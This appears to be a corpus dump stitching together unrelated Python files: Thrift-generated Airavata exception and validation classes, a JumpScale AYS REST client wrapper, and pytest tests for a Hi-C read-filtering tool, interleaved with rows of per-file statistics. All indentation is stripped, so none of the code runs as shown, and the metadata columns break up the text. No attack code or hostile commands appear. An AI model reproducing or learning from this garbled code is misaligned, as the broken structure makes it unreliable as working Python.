oprot.writeFieldBegin('result', TType.BOOL, 1)
oprot.writeBool(self.result)
oprot.writeFieldEnd()
if self.errorDetails is not None:
oprot.writeFieldBegin('errorDetails', TType.STRING, 2)
oprot.writeString(self.errorDetails.encode('utf-8') if sys.version_info[0] == 2 else self.errorDetails)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.result is None:
raise TProtocolException(message='Required field result is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class ValidationResults(object):
"""
Attributes:
- validationState
- validationResultList
"""
thrift_spec = (
None, # 0
(1, TType.BOOL, 'validationState', None, None, ), # 1
(2, TType.LIST, 'validationResultList', (TType.STRUCT, (ValidatorResult, ValidatorResult.thrift_spec), False), None, ), # 2
)
def __init__(self, validationState=None, validationResultList=None,):
self.validationState = validationState
self.validationResultList = validationResultList
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.BOOL:
self.validationState = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.LIST:
self.validationResultList = []
(_etype3, _size0) = iprot.readListBegin()
for _i4 in range(_size0):
_elem5 = ValidatorResult()
_elem5.read(iprot)
self.validationResultList.append(_elem5)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('ValidationResults')
if self.validationState is not None:
oprot.writeFieldBegin('validationState', TType.BOOL, 1)
oprot.writeBool(self.validationState)
oprot.writeFieldEnd()
if self.validationResultList is not None:
oprot.writeFieldBegin('validationResultList', TType.LIST, 2)
oprot.writeListBegin(TType.STRUCT, len(self.validationResultList))
for iter6 in self.validationResultList:
iter6.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.validationState is None:
raise TProtocolException(message='Required field validationState is unset!')
if self.validationResultList is None:
raise TProtocolException(message='Required field validationResultList is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class LaunchValidationException(TException):
"""
Attributes:
- validationResult
- errorMessage
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'validationResult', (ValidationResults, ValidationResults.thrift_spec), None, ), # 1
(2, TType.STRING, 'errorMessage', 'UTF8', None, ), # 2
)
def __init__(self, validationResult=None, errorMessage=None,):
self.validationResult = validationResult
self.errorMessage = errorMessage
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.validationResult = ValidationResults()
self.validationResult.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.errorMessage = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('LaunchValidationException')
if self.validationResult is not None:
oprot.writeFieldBegin('validationResult', TType.STRUCT, 1)
self.validationResult.write(oprot)
oprot.writeFieldEnd()
if self.errorMessage is not None:
oprot.writeFieldBegin('errorMessage', TType.STRING, 2)
oprot.writeString(self.errorMessage.encode('utf-8') if sys.version_info[0] == 2 else self.errorMessage)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.validationResult is None:
raise TProtocolException(message='Required field validationResult is unset!')
return
def __str__(self):
return repr(self)
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class AiravataSystemException(TException):
"""
This exception is thrown by Airavata Services when a call fails as a result of
a problem in the service that could not be changed through client's action.
airavataErrorType: The message type indicating the error that occurred.
must be one of the values of AiravataErrorType.
message: This may contain additional information about the error
Attributes:
- airavataErrorType
- message
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'airavataErrorType', None, None, ), # 1
(2, TType.STRING, 'message', 'UTF8', None, ), # 2
)
def __init__(self, airavataErrorType=None, message=None,):
self.airavataErrorType = airavataErrorType
self.message = message
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.airavataErrorType = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.message = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('AiravataSystemException')
if self.airavataErrorType is not None:
oprot.writeFieldBegin('airavataErrorType', TType.I32, 1)
oprot.writeI32(self.airavataErrorType)
oprot.writeFieldEnd()
if self.message is not None:
oprot.writeFieldBegin('message', TType.STRING, 2)
oprot.writeString(self.message.encode('utf-8') if sys.version_info[0] == 2 else self.message)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.airavataErrorType is None:
raise TProtocolException(message='Required field airavataErrorType is unset!')
return
def __str__(self):
return repr(self)
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
| 34.860759
| 134
| 0.600944
| 3,610
| 33,048
| 5.270083
| 0.078947
| 0.017083
| 0.030276
| 0.026491
| 0.77929
| 0.761104
| 0.743233
| 0.720683
| 0.716373
| 0.716373
| 0
| 0.008794
| 0.298051
| 33,048
| 947
| 135
| 34.897571
| 0.81132
| 0.094832
| 0
| 0.796188
| 1
| 0
| 0.054961
| 0.013002
| 0
| 0
| 0
| 0
| 0
| 1
| 0.136364
| false
| 0
| 0.007331
| 0.05132
| 0.315249
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3f3621aacfc33cfdd5494d131fba331637b25078
| 15,067
|
py
|
Python
|
sandbox/lib/jumpscale/JumpScale9Lib/clients/atyourservice/ays/ays_service.py
|
Jumpscale/sandbox_linux
|
2aacd36b467ef30ac83718abfa82c6883b67a02f
|
[
"Apache-2.0"
] | 2
|
2017-06-07T08:11:47.000Z
|
2017-11-10T02:19:48.000Z
|
JumpScale9Lib/clients/atyourservice/ays/ays_service.py
|
Jumpscale/lib9
|
82224784ef2a7071faeb48349007211c367bc673
|
[
"Apache-2.0"
] | 188
|
2017-06-21T06:16:13.000Z
|
2020-06-17T14:20:24.000Z
|
sandbox/lib/jumpscale/JumpScale9Lib/clients/atyourservice/ays/ays_service.py
|
Jumpscale/sandbox_linux
|
2aacd36b467ef30ac83718abfa82c6883b67a02f
|
[
"Apache-2.0"
] | 3
|
2018-06-12T05:18:28.000Z
|
2019-09-24T06:49:17.000Z
|
from js9 import j
JSBASE = j.application.jsbase_get_class()
class AysService(JSBASE):
def __init__(self, client):
JSBASE.__init__(self)
self.client = client
def reload(self, data, headers=None, query_params=None, content_type="application/json"):
"""
reload AYS
It is method for POST /ays/reload
"""
uri = self.client._base_url + "/ays/reload"
return self.client._post(uri, data, headers, query_params, content_type)
def getActorByName(self, actor, repository, headers=None, query_params=None, content_type="application/json"):
"""
Get an actor by name
It is method for GET /ays/repository/{repository}/actor/{actor}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/actor/"+actor
return self.client._get(uri, headers, query_params, content_type)
def updateActor(self, data, actor, repository, headers=None, query_params=None, content_type="application/json"):
"""
update an actor from a template to the last version
It is method for PUT /ays/repository/{repository}/actor/{actor}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/actor/"+actor
return self.client._put(uri, data, headers, query_params, content_type)
def listActors(self, repository, headers=None, query_params=None, content_type="application/json"):
"""
list all actors in the repository
It is method for GET /ays/repository/{repository}/actor
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/actor"
return self.client._get(uri, headers, query_params, content_type)
def deleteRun(self, runid, repository, headers=None, query_params=None, content_type="application/json"):
"""
delete a run
It is method for DELETE /ays/repository/{repository}/aysrun/{runid}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/aysrun/"+runid
return self.client._delete(uri, headers, query_params, content_type)
def getRun(self, runid, repository, headers=None, query_params=None, content_type="application/json"):
"""
Get an aysrun
It is method for GET /ays/repository/{repository}/aysrun/{runid}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/aysrun/"+runid
return self.client._get(uri, headers, query_params, content_type)
def getJob(self, jobid, repository, headers=None, query_params=None, content_type="application/json"):
"""
Get a jobid
It is method for GET /ays/repository/{repository}/job{jobid}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/job/"+jobid
return self.client._get(uri, headers, query_params, content_type)
def listJobs(self, repository, headers=None, query_params=None, content_type="application/json"):
"""
List all jobs in a repo
It is method for GET /ays/repository/{repository}/job
filters are
actor:str Only list jobs of this actor
service:str Only list jobs of this service
action:str Only list jobs of this action
type:str Only list jobs with this state
serviceKey:str Only list jobs of this serviceKey
fromEpoch:int Only list jobs from this epoch
toEpoch:int Only list jobs till this epoch
tags: comma-seperated list of tags to be included
fields:str comma-seperated list of fields to be included in the response
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/job"
return self.client._get(uri, headers, query_params, content_type)
def executeRun(self, data, runid, repository, headers=None, query_params=None, content_type="application/json"):
"""
execute an aysrun
It is method for POST /ays/repository/{repository}/aysrun/{runid}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/aysrun/"+runid
return self.client._post(uri, data, headers, query_params, content_type)
def listRuns(self, repository, headers=None, query_params=None, content_type="application/json"):
"""
list all runs of the repository
It is method for GET /ays/repository/{repository}/aysrun
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/aysrun"
return self.client._get(uri, headers, query_params, content_type)
def createRun(self, data, repository, headers=None, query_params=None, content_type="application/json"):
"""
Create a run based on all the action scheduled. This call returns an AYSRun object describing what is going to hapen on the repository.
This is an asyncronous call. To be notify of the status of the run when then execution is finised or when an error occurs, you need to specify a callback url.
A post request will be send to this callback url with the status of the run and the key of the run. Using this key you can inspect in detail the result of the run
using the 'GET /ays/repository/{repository}/aysrun/{aysrun_key}' endpoint
It is method for POST /ays/repository/{repository}/aysrun
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/aysrun"
return self.client._post(uri, data, headers, query_params, content_type)
def archiveBlueprint(self, data, blueprint, repository, headers=None, query_params=None, content_type="application/json"):
"""
archive the blueprint
It is method for PUT /ays/repository/{repository}/blueprint/{blueprint}/archive
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/blueprint/"+blueprint+"/archive"
return self.client._put(uri, data, headers, query_params, content_type)
def restoreBlueprint(self, data, blueprint, repository, headers=None, query_params=None, content_type="application/json"):
"""
restore the blueprint
It is method for PUT /ays/repository/{repository}/blueprint/{blueprint}/restore
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/blueprint/"+blueprint+"/restore"
return self.client._put(uri, data, headers, query_params, content_type)
def deleteBlueprint(self, blueprint, repository, headers=None, query_params=None, content_type="application/json"):
"""
delete blueprint
It is method for DELETE /ays/repository/{repository}/blueprint/{blueprint}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/blueprint/"+blueprint
return self.client._delete(uri, headers, query_params, content_type)
def getBlueprint(self, blueprint, repository, headers=None, query_params=None, content_type="application/json"):
"""
Get a blueprint
It is method for GET /ays/repository/{repository}/blueprint/{blueprint}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/blueprint/"+blueprint
return self.client._get(uri, headers, query_params, content_type)
def executeBlueprint(self, data, blueprint, repository, headers=None, query_params=None, content_type="application/json"):
"""
Execute the blueprint
It is method for POST /ays/repository/{repository}/blueprint/{blueprint}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/blueprint/"+blueprint
return self.client._post(uri, data, headers, query_params, content_type)
def updateBlueprint(self, data, blueprint, repository, headers=None, query_params=None, content_type="application/json"):
"""
Update existing blueprint
It is method for PUT /ays/repository/{repository}/blueprint/{blueprint}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/blueprint/"+blueprint
return self.client._put(uri, data, headers, query_params, content_type)
def listBlueprints(self, repository, headers=None, query_params=None, content_type="application/json"):
"""
List all blueprint
It is method for GET /ays/repository/{repository}/blueprint
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/blueprint"
return self.client._get(uri, headers, query_params, content_type)
def createBlueprint(self, data, repository, headers=None, query_params=None, content_type="application/json"):
"""
Create a new blueprint
It is method for POST /ays/repository/{repository}/blueprint
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/blueprint"
return self.client._post(uri, data, headers, query_params, content_type)
def destroyRepository(self, data, repository, headers=None, query_params=None, content_type="application/json"):
"""
destroy repo without deleting it from FS
It is method for POST /ays/repository/{repository}/destroy
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/destroy"
return self.client._post(uri, data, headers, query_params, content_type)
def getCurrentRun(self, repository, headers=None, query_params=None, content_type="application/json"):
"""
Inspect if a run is currently beeing executed
It is method for GET /ays/repository/{repository}/scheduler/running
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/scheduler/running"
return self.client._get(uri, headers, query_params, content_type)
def getSchedulerStatus(self, repository, headers=None, query_params=None, content_type="application/json"):
"""
Return status of the scheduler
It is method for GET /ays/repository/{repository}/scheduler
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/scheduler"
return self.client._get(uri, headers, query_params, content_type)
def deleteServiceByName(self, name, role, repository, headers=None, query_params=None, content_type="application/json"):
"""
delete a service and all its children
It is method for DELETE /ays/repository/{repository}/service/{role}/{name}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/service/"+role+"/"+name
return self.client._delete(uri, headers, query_params, content_type)
def getServiceByName(self, name, role, repository, headers=None, query_params=None, content_type="application/json"):
"""
Get a service by its name
It is method for GET /ays/repository/{repository}/service/{role}/{name}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/service/"+role+"/"+name
return self.client._get(uri, headers, query_params, content_type)
def listServicesByRole(self, role, repository, headers=None, query_params=None, content_type="application/json"):
"""
List all services of role 'role' in the repository
It is method for GET /ays/repository/{repository}/service/{role}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/service/"+role
return self.client._get(uri, headers, query_params, content_type)
def listServices(self, repository, headers=None, query_params=None, content_type="application/json"):
"""
List all services in the repository
It is method for GET /ays/repository/{repository}/service
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/service"
return self.client._get(uri, headers, query_params, content_type)
def getTemplate(self, name, repository, headers=None, query_params=None, content_type="application/json"):
"""
Get a template
It is method for GET /ays/repository/{repository}/template/{name}
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/template/"+name
return self.client._get(uri, headers, query_params, content_type)
def listTemplates(self, repository, headers=None, query_params=None, content_type="application/json"):
"""
list all templates
It is method for GET /ays/repository/{repository}/template
"""
uri = self.client._base_url + "/ays/repository/"+repository+"/template"
return self.client._get(uri, headers, query_params, content_type)
def deleteRepository(self, repository, headers=None, query_params=None, content_type="application/json"):
"""
Delete a repository
It is method for DELETE /ays/repository/{repository}
"""
uri = self.client._base_url + "/ays/repository/"+repository
return self.client._delete(uri, headers, query_params, content_type)
def getRepository(self, repository, headers=None, query_params=None, content_type="application/json"):
"""
Get information of a repository
It is method for GET /ays/repository/{repository}
"""
uri = self.client._base_url + "/ays/repository/"+repository
return self.client._get(uri, headers, query_params, content_type)
def listRepositories(self, headers=None, query_params=None, content_type="application/json"):
"""
list all repositorys
It is method for GET /ays/repository
"""
uri = self.client._base_url + "/ays/repository"
return self.client._get(uri, headers, query_params, content_type)
def createRepository(self, data, headers=None, query_params=None, content_type="application/json"):
"""
create a new repository
It is method for POST /ays/repository
"""
uri = self.client._base_url + "/ays/repository"
return self.client._post(uri, data, headers, query_params, content_type)
def addTemplateRepo(self, data, headers=None, query_params=None, content_type="application/json"):
"""
add a new actor template repository
It is method for POST /ays/template_repo
"""
uri = self.client._base_url + "/ays/template_repo"
return self.client._post(uri, data, headers, query_params, content_type)
def getAYSTemplate(self, name, headers=None, query_params=None, content_type="application/json"):
"""
get an AYS template
It is method for GET /ays/templates/{name}
"""
uri = self.client._base_url + "/ays/templates/"+name
return self.client._get(uri, headers, query_params, content_type)
def listAYSTemplates(self, headers=None, query_params=None, content_type="application/json"):
"""
list all AYS templates
It is method for GET /ays/templates
"""
uri = self.client._base_url + "/ays/templates"
return self.client._get(uri, headers, query_params, content_type)
| 45.110778
| 170
| 0.670671
| 1,847
| 15,067
| 5.331348
| 0.094748
| 0.073119
| 0.137808
| 0.078196
| 0.83853
| 0.828476
| 0.807556
| 0.784097
| 0.766325
| 0.692597
| 0
| 0.000084
| 0.21411
| 15,067
| 333
| 171
| 45.246246
| 0.831518
| 0.261764
| 0
| 0.486486
| 0
| 0
| 0.138226
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.324324
| false
| 0
| 0.009009
| 0
| 0.657658
| 0.144144
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
3f3d6f8f5bddab26e7bb0f9e36ac3508487d95e9
| 9,613
|
py
|
Python
|
tests/test_tb_filter.py
|
Multiscale-Genomics/mg-process-fastq
|
50c7115c0c1a6af48dc34f275e469d1b9eb02999
|
[
"Apache-2.0"
] | 2
|
2017-07-31T11:45:46.000Z
|
2017-08-09T09:32:35.000Z
|
tests/test_tb_filter.py
|
Multiscale-Genomics/mg-process-fastq
|
50c7115c0c1a6af48dc34f275e469d1b9eb02999
|
[
"Apache-2.0"
] | 28
|
2016-11-17T11:12:32.000Z
|
2018-11-02T14:09:13.000Z
|
tests/test_tb_filter.py
|
Multiscale-Genomics/mg-process-fastq
|
50c7115c0c1a6af48dc34f275e469d1b9eb02999
|
[
"Apache-2.0"
] | 4
|
2017-02-12T17:47:21.000Z
|
2018-05-29T08:16:27.000Z
|
"""
.. See the NOTICE file distributed with this work for additional information
regarding copyright ownership.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function
import os.path
import pytest
from tool.tb_filter import tbFilterTool
@pytest.mark.hic
def test_tb_filter_frag_01():
"""
Test case to ensure that the BWA indexer works.
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
reads_tsv = resource_path + "tb.Human.SRR1658573_frag.tsv"
metadata = {
'assembly': 'test',
'expt_name': 'tb.Human.SRR1658573_frag_01',
'enzyme_name': 'MboI',
'windows': ((1, 'end')),
'mapping': ['frag', 'frag']
}
tpm = tbFilterTool({"execution": resource_path})
tpm_files, tpm_meta = tpm.run([reads_tsv], [], metadata) # pylint: disable=unused-variable
reads_tsv = resource_path + metadata['expt_name'] + "_filtered_map.tsv"
assert os.path.isfile(resource_path + "tb.Human.SRR1658573_frag_01_filtered_map.tsv") is True
assert os.path.getsize(resource_path + "tb.Human.SRR1658573_frag_01_filtered_map.tsv") > 0
assert os.path.isfile(reads_tsv + '_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_duplicated.tsv') is True
assert os.path.getsize(reads_tsv + '_duplicated.tsv') > 0
assert os.path.isfile(reads_tsv + '_error.tsv') is True
assert os.path.getsize(reads_tsv + '_error.tsv') > 0
assert os.path.isfile(reads_tsv + '_extra_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_extra_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_over-represented.tsv') is True
assert os.path.getsize(reads_tsv + '_over-represented.tsv') > 0
assert os.path.isfile(reads_tsv + '_random_breaks.tsv') is True
assert os.path.getsize(reads_tsv + '_random_breaks.tsv') > 0
assert os.path.isfile(reads_tsv + '_self-circle.tsv') is True
assert os.path.getsize(reads_tsv + '_self-circle.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_close_from_RES.tsv') is True
assert os.path.getsize(reads_tsv + '_too_close_from_RES.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_large.tsv') is True
# assert os.path.getsize(reads_tsv + '_too_large.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_short.tsv') is True
assert os.path.getsize(reads_tsv + '_too_short.tsv') > 0
@pytest.mark.hic
def test_tb_filter_frag_02():
"""
Test case to ensure that the BWA indexer works.
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
reads_tsv = resource_path + "tb.Human.SRR1658573_frag.tsv"
metadata = {
'assembly': 'test',
'expt_name': 'tb.Human.SRR1658573_frag_02',
'enzyme_name': 'MboI',
'windows': ((1, 'end')),
'mapping': ['frag', 'frag'],
'conservative_filtering': True
}
tpm = tbFilterTool({"execution": resource_path})
tpm_files, tpm_meta = tpm.run([reads_tsv], [], metadata) # pylint: disable=unused-variable
reads_tsv = resource_path + metadata['expt_name'] + "_filtered_map.tsv"
assert os.path.isfile(resource_path + "tb.Human.SRR1658573_frag_02_filtered_map.tsv") is True
assert os.path.getsize(resource_path + "tb.Human.SRR1658573_frag_02_filtered_map.tsv") > 0
assert os.path.isfile(reads_tsv + '_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_duplicated.tsv') is True
assert os.path.getsize(reads_tsv + '_duplicated.tsv') > 0
assert os.path.isfile(reads_tsv + '_error.tsv') is True
assert os.path.getsize(reads_tsv + '_error.tsv') > 0
assert os.path.isfile(reads_tsv + '_extra_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_extra_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_over-represented.tsv') is True
assert os.path.getsize(reads_tsv + '_over-represented.tsv') > 0
assert os.path.isfile(reads_tsv + '_random_breaks.tsv') is True
assert os.path.getsize(reads_tsv + '_random_breaks.tsv') > 0
assert os.path.isfile(reads_tsv + '_self-circle.tsv') is True
assert os.path.getsize(reads_tsv + '_self-circle.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_close_from_RES.tsv') is True
assert os.path.getsize(reads_tsv + '_too_close_from_RES.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_large.tsv') is True
# assert os.path.getsize(reads_tsv + '_too_large.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_short.tsv') is True
assert os.path.getsize(reads_tsv + '_too_short.tsv') > 0
@pytest.mark.hic
def test_tb_filter_iter_01():
"""
Test case to ensure that the BWA indexer works.
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
reads_tsv = resource_path + "tb.Human.SRR1658573_iter.tsv"
metadata = {
'assembly': 'test',
'expt_name': 'tb.Human.SRR1658573_iter_01',
'enzyme_name': 'MboI',
'windows': ((1, 'end')),
'mapping': ['iter', 'iter']
}
tpm = tbFilterTool({"execution": resource_path})
tpm_files, tpm_meta = tpm.run([reads_tsv], [], metadata) # pylint: disable=unused-variable
reads_tsv = resource_path + metadata['expt_name'] + "_filtered_map.tsv"
assert os.path.isfile(resource_path + "tb.Human.SRR1658573_iter_01_filtered_map.tsv") is True
assert os.path.getsize(resource_path + "tb.Human.SRR1658573_iter_01_filtered_map.tsv") > 0
assert os.path.isfile(reads_tsv + '_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_duplicated.tsv') is True
assert os.path.getsize(reads_tsv + '_duplicated.tsv') > 0
assert os.path.isfile(reads_tsv + '_error.tsv') is True
assert os.path.getsize(reads_tsv + '_error.tsv') > 0
assert os.path.isfile(reads_tsv + '_extra_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_extra_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_over-represented.tsv') is True
assert os.path.getsize(reads_tsv + '_over-represented.tsv') > 0
assert os.path.isfile(reads_tsv + '_random_breaks.tsv') is True
assert os.path.getsize(reads_tsv + '_random_breaks.tsv') > 0
assert os.path.isfile(reads_tsv + '_self-circle.tsv') is True
assert os.path.getsize(reads_tsv + '_self-circle.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_close_from_RES.tsv') is True
assert os.path.getsize(reads_tsv + '_too_close_from_RES.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_large.tsv') is True
# assert os.path.getsize(reads_tsv + '_too_large.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_short.tsv') is True
assert os.path.getsize(reads_tsv + '_too_short.tsv') > 0
@pytest.mark.hic
def test_tb_filter_iter_02():
"""
Test case to ensure that the BWA indexer works.
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
reads_tsv = resource_path + "tb.Human.SRR1658573_iter.tsv"
metadata = {
'assembly': 'test',
'expt_name': 'tb.Human.SRR1658573_iter_02',
'enzyme_name': 'MboI',
'windows': ((1, 'end')),
'mapping': ['iter', 'iter'],
'conservative_filtering': True
}
tpm = tbFilterTool({"execution": resource_path})
tpm_files, tpm_meta = tpm.run([reads_tsv], [], metadata) # pylint: disable=unused-variable
reads_tsv = resource_path + metadata['expt_name'] + "_filtered_map.tsv"
assert os.path.isfile(resource_path + "tb.Human.SRR1658573_iter_02_filtered_map.tsv") is True
assert os.path.getsize(resource_path + "tb.Human.SRR1658573_iter_02_filtered_map.tsv") > 0
assert os.path.isfile(reads_tsv + '_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_duplicated.tsv') is True
assert os.path.getsize(reads_tsv + '_duplicated.tsv') > 0
assert os.path.isfile(reads_tsv + '_error.tsv') is True
assert os.path.getsize(reads_tsv + '_error.tsv') > 0
assert os.path.isfile(reads_tsv + '_extra_dangling-end.tsv') is True
assert os.path.getsize(reads_tsv + '_extra_dangling-end.tsv') > 0
assert os.path.isfile(reads_tsv + '_over-represented.tsv') is True
assert os.path.getsize(reads_tsv + '_over-represented.tsv') > 0
assert os.path.isfile(reads_tsv + '_random_breaks.tsv') is True
assert os.path.getsize(reads_tsv + '_random_breaks.tsv') > 0
assert os.path.isfile(reads_tsv + '_self-circle.tsv') is True
assert os.path.getsize(reads_tsv + '_self-circle.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_close_from_RES.tsv') is True
assert os.path.getsize(reads_tsv + '_too_close_from_RES.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_large.tsv') is True
# assert os.path.getsize(reads_tsv + '_too_large.tsv') > 0
assert os.path.isfile(reads_tsv + '_too_short.tsv') is True
assert os.path.getsize(reads_tsv + '_too_short.tsv') > 0
| 46.665049
| 97
| 0.696453
| 1,430
| 9,613
| 4.427273
| 0.099301
| 0.091929
| 0.166798
| 0.125099
| 0.906334
| 0.906334
| 0.906334
| 0.906334
| 0.899384
| 0.874112
| 0
| 0.024568
| 0.170082
| 9,613
| 205
| 98
| 46.892683
| 0.76899
| 0.125975
| 0
| 0.808219
| 0
| 0
| 0.280053
| 0.138345
| 0
| 0
| 0
| 0
| 0.575342
| 1
| 0.027397
| false
| 0
| 0.027397
| 0
| 0.054795
| 0.006849
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
